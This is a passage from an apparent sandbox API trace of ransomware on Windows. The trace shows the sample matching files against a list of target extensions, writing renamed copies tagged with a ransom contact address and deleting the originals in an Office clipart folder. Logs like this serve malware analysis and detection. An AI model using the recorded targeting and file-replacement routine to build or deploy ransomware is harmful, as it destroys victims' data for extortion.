Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107750.WMF") returned 68 [0185.085] lstrlenW (lpString=".doc") returned 4 [0185.086] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0185.086] lstrlenW (lpString=".docx") returned 5 [0185.086] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0185.086] lstrlenW (lpString=".pdf") returned 4 [0185.086] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0185.086] lstrlenW (lpString=".xls") returned 4 [0185.086] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0185.086] lstrlenW (lpString=".xlsx") returned 5 [0185.086] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0185.086] lstrlenW (lpString=".ppt") returned 4 [0185.086] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0185.086] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107750.WMF") returned 68 [0185.086] lstrlenW (lpString=".zip") returned 4 [0185.086] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0185.086] lstrlenW (lpString=".rar") returned 4 [0185.086] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0185.086] lstrlenW (lpString=".bz2") returned 4 [0185.086] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0185.086] lstrlenW (lpString=".7z") returned 3 [0185.086] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0185.086] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107750.WMF") returned 68 [0185.087] lstrlenW (lpString=".dbf") returned 4 [0185.087] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0185.087] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107750.WMF") returned 68 [0185.087] lstrlenW (lpString=".1cd") returned 4 [0185.087] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0185.087] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107750.WMF") returned 68 [0185.087] lstrlenW (lpString=".jpg") returned 4 [0185.087] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0185.087] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0185.087] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0185.087] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0136865.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0136865.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0185.088] GetLastError () returned 0x0 [0185.088] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x4146, lpOverlapped=0x0) returned 1 [0185.090] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x4150, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x4150, lpOverlapped=0x0) returned 1 [0185.092] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0185.092] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0185.092] SetEndOfFile (hFile=0x380) returned 1 [0185.093] CloseHandle (hObject=0x380) returned 1 [0185.093] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0185.093] SetEndOfFile (hFile=0x334) returned 1 [0185.094] CloseHandle (hObject=0x334) returned 1 [0185.094] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0136865.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0185.094] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0136865.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0136865.wmf")) returned 1 [0185.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0136865.WMF") returned 68 [0185.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0136865.WMF") returned 68 [0185.095] lstrlenW (lpString=".doc") returned 4 [0185.095] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0185.095] lstrlenW (lpString=".docx") returned 5 [0185.095] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1 [0185.095] lstrlenW (lpString=".pdf") returned 4 [0185.095] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0185.095] lstrlenW (lpString=".xls") returned 4 [0185.095] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0185.095] lstrlenW (lpString=".xlsx") returned 5 [0185.095] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1 [0185.095] lstrlenW (lpString=".ppt") returned 4 [0185.095] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0185.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0136865.WMF") returned 68 [0185.095] lstrlenW (lpString=".zip") returned 4 [0185.095] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0185.095] lstrlenW (lpString=".rar") returned 4 [0185.095] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0185.095] lstrlenW (lpString=".bz2") returned 4 [0185.095] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0185.095] lstrlenW (lpString=".7z") returned 3 [0185.095] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0185.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0136865.WMF") returned 68 [0185.095] lstrlenW (lpString=".dbf") returned 4 [0185.096] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0185.096] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0136865.WMF") returned 68 [0185.096] lstrlenW (lpString=".1cd") returned 4 [0185.096] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0185.096] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0136865.WMF") returned 68 [0185.096] lstrlenW (lpString=".jpg") returned 4 [0185.096] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0185.096] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0185.096] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0185.096] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0144773.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0144773.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0185.097] GetLastError () returned 0x0 [0185.097] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x9d27, lpOverlapped=0x0) returned 1 [0185.100] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x9d30, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x9d30, lpOverlapped=0x0) returned 1 [0185.102] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0185.102] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0185.102] SetEndOfFile (hFile=0x380) returned 1 [0185.102] CloseHandle (hObject=0x380) returned 1 [0185.103] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0185.103] SetEndOfFile (hFile=0x334) returned 1 [0185.104] CloseHandle (hObject=0x334) returned 1 [0185.104] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0144773.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0185.104] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0144773.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0144773.jpg")) returned 1 [0185.105] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0144773.JPG") returned 68 [0185.105] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0144773.JPG") returned 68 [0185.105] lstrlenW (lpString=".doc") returned 4 [0185.105] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0185.105] lstrlenW (lpString=".docx") returned 5 [0185.105] lstrcmpiW (lpString1=".docx", lpString2="3.JPG") returned -1 [0185.105] lstrlenW (lpString=".pdf") returned 4 [0185.105] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0185.105] lstrlenW (lpString=".xls") returned 4 [0185.105] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0185.105] lstrlenW (lpString=".xlsx") returned 5 [0185.105] lstrcmpiW (lpString1=".xlsx", lpString2="3.JPG") returned -1 [0185.105] lstrlenW (lpString=".ppt") returned 4 [0185.105] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0185.105] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0144773.JPG") returned 68 [0185.105] lstrlenW (lpString=".zip") returned 4 [0185.105] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0185.105] lstrlenW (lpString=".rar") returned 4 [0185.105] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0185.105] lstrlenW (lpString=".bz2") returned 4 [0185.105] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0185.105] lstrlenW (lpString=".7z") returned 3 [0185.106] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0185.106] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0144773.JPG") returned 68 [0185.106] lstrlenW (lpString=".dbf") returned 4 [0185.106] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0185.106] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0144773.JPG") returned 68 [0185.106] lstrlenW (lpString=".1cd") returned 4 [0185.106] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0185.106] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0144773.JPG") returned 68 [0185.106] lstrlenW (lpString=".jpg") returned 4 [0185.106] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0185.106] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0185.106] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0185.106] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145168.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145168.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0185.108] GetLastError () returned 0x0 [0185.108] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x8379, lpOverlapped=0x0) returned 1 [0185.388] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x8380, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x8380, lpOverlapped=0x0) returned 1 [0185.390] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0185.390] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0185.390] SetEndOfFile (hFile=0x380) returned 1 [0185.390] CloseHandle (hObject=0x380) returned 1 [0185.390] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0185.390] SetEndOfFile (hFile=0x334) returned 1 [0185.391] CloseHandle (hObject=0x334) returned 1 [0185.391] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145168.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0185.391] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145168.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145168.jpg")) returned 1 [0185.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145168.JPG") returned 68 [0185.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145168.JPG") returned 68 [0185.392] lstrlenW (lpString=".doc") returned 4 [0185.392] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0185.392] lstrlenW (lpString=".docx") returned 5 [0185.392] lstrcmpiW (lpString1=".docx", lpString2="8.JPG") returned -1 [0185.392] lstrlenW (lpString=".pdf") returned 4 [0185.392] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0185.392] lstrlenW (lpString=".xls") returned 4 [0185.392] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0185.392] lstrlenW (lpString=".xlsx") returned 5 [0185.392] lstrcmpiW (lpString1=".xlsx", lpString2="8.JPG") returned -1 [0185.392] lstrlenW (lpString=".ppt") returned 4 [0185.392] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0185.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145168.JPG") returned 68 [0185.392] lstrlenW (lpString=".zip") returned 4 [0185.392] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0185.392] lstrlenW (lpString=".rar") returned 4 [0185.392] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0185.392] lstrlenW (lpString=".bz2") returned 4 [0185.392] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0185.392] lstrlenW (lpString=".7z") returned 3 [0185.392] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0185.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145168.JPG") returned 68 [0185.392] lstrlenW (lpString=".dbf") returned 4 [0185.392] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0185.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145168.JPG") returned 68 [0185.392] lstrlenW (lpString=".1cd") returned 4 [0185.393] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0185.393] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145168.JPG") returned 68 [0185.393] lstrlenW (lpString=".jpg") returned 4 [0185.393] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0185.393] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0185.393] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0185.393] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145707.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145707.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0185.394] GetLastError () returned 0x0 [0185.394] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x8fd4, lpOverlapped=0x0) returned 1 [0188.092] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x8fe0, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x8fe0, lpOverlapped=0x0) returned 1 [0188.094] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0188.094] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0188.094] SetEndOfFile (hFile=0x380) returned 1 [0188.094] CloseHandle (hObject=0x380) returned 1 [0188.094] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0188.094] SetEndOfFile (hFile=0x334) returned 1 [0188.095] CloseHandle (hObject=0x334) returned 1 [0188.095] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145707.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0188.096] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145707.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145707.jpg")) returned 1 [0188.096] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145707.JPG") returned 68 [0188.096] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145707.JPG") returned 68 [0188.096] lstrlenW (lpString=".doc") returned 4 [0188.096] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0188.096] lstrlenW (lpString=".docx") returned 5 [0188.097] lstrcmpiW (lpString1=".docx", lpString2="7.JPG") returned -1 [0188.097] lstrlenW (lpString=".pdf") returned 4 [0188.097] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0188.097] lstrlenW (lpString=".xls") returned 4 [0188.097] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0188.097] lstrlenW (lpString=".xlsx") returned 5 [0188.097] lstrcmpiW (lpString1=".xlsx", lpString2="7.JPG") returned -1 [0188.097] lstrlenW (lpString=".ppt") returned 4 [0188.097] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0188.097] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145707.JPG") returned 68 [0188.097] lstrlenW (lpString=".zip") returned 4 [0188.097] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0188.097] lstrlenW (lpString=".rar") returned 4 [0188.097] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0188.097] lstrlenW (lpString=".bz2") returned 4 [0188.097] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0188.097] lstrlenW (lpString=".7z") returned 3 [0188.097] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0188.097] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145707.JPG") returned 68 [0188.097] lstrlenW (lpString=".dbf") returned 4 [0188.097] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0188.097] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145707.JPG") returned 68 [0188.097] lstrlenW (lpString=".1cd") returned 4 [0188.097] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0188.097] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145707.JPG") returned 68 [0188.097] lstrlenW (lpString=".jpg") returned 4 [0188.097] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0188.098] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0188.098] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0188.098] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145904.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145904.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0188.099] GetLastError () returned 0x0 [0188.099] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x9a76, lpOverlapped=0x0) returned 1 [0188.101] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x9a80, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x9a80, lpOverlapped=0x0) returned 1 [0188.103] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0188.103] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0188.103] SetEndOfFile (hFile=0x380) returned 1 [0188.103] CloseHandle (hObject=0x380) returned 1 [0188.103] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0188.103] SetEndOfFile (hFile=0x334) returned 1 [0188.104] CloseHandle (hObject=0x334) returned 1 [0188.104] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145904.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0188.105] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145904.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145904.jpg")) returned 1 [0188.105] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145904.JPG") returned 68 [0188.105] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145904.JPG") returned 68 [0188.105] lstrlenW (lpString=".doc") returned 4 [0188.105] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0188.105] lstrlenW (lpString=".docx") returned 5 [0188.105] lstrcmpiW (lpString1=".docx", lpString2="4.JPG") returned -1 [0188.105] lstrlenW (lpString=".pdf") returned 4 [0188.105] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0188.105] lstrlenW (lpString=".xls") returned 4 [0188.105] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0188.106] lstrlenW (lpString=".xlsx") returned 5 [0188.106] lstrcmpiW (lpString1=".xlsx", lpString2="4.JPG") returned -1 [0188.106] lstrlenW (lpString=".ppt") returned 4 [0188.106] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0188.106] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145904.JPG") returned 68 [0188.106] lstrlenW (lpString=".zip") returned 4 [0188.106] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0188.106] lstrlenW (lpString=".rar") returned 4 [0188.106] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0188.106] lstrlenW (lpString=".bz2") returned 4 [0188.106] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0188.106] lstrlenW (lpString=".7z") returned 3 [0188.106] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0188.106] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145904.JPG") returned 68 [0188.106] lstrlenW (lpString=".dbf") returned 4 [0188.106] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0188.106] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145904.JPG") returned 68 [0188.106] lstrlenW (lpString=".1cd") returned 4 [0188.106] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0188.106] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145904.JPG") returned 68 [0188.106] lstrlenW (lpString=".jpg") returned 4 [0188.106] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0188.107] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: 